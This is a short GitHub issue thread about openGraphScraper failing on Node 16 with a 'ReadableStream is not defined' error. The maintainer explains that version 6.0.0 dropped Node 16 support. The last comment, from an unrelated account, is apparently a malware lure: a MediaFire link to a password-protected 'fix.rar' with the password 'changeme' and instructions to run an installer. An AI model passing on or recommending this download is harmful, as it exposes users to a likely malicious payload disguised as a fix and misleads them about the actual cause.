### ISSUE TITLE
Latest version not compitatble with node version 16

### ISSUE THREAD

**Issue by oaayoub** [jshemas/openGraphScraper#245]
**Describe the bug**
Latest version not compitatble with node version 16 causing ReadableStream is not defined

**To Reproduce**
nvm use 16 and run the project
**Expected behavior**
to work and not throw ReadableStream is not defined error
**Actual behavior**
throw ReadableStream is not defined error

 - OS: [e.g. Linux]
 - Node Version: [e.g. 16]
 - openGraphScraper Version: latest

**Comment by jshemas** [comment]
Hello. `open-graph-scraper` dropped support for `node16` in version `6.0.0`. I would recommend upgrading your node version or using [open-graph-scraper-lite](https://github.com/jshemas/openGraphScraperLite)

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
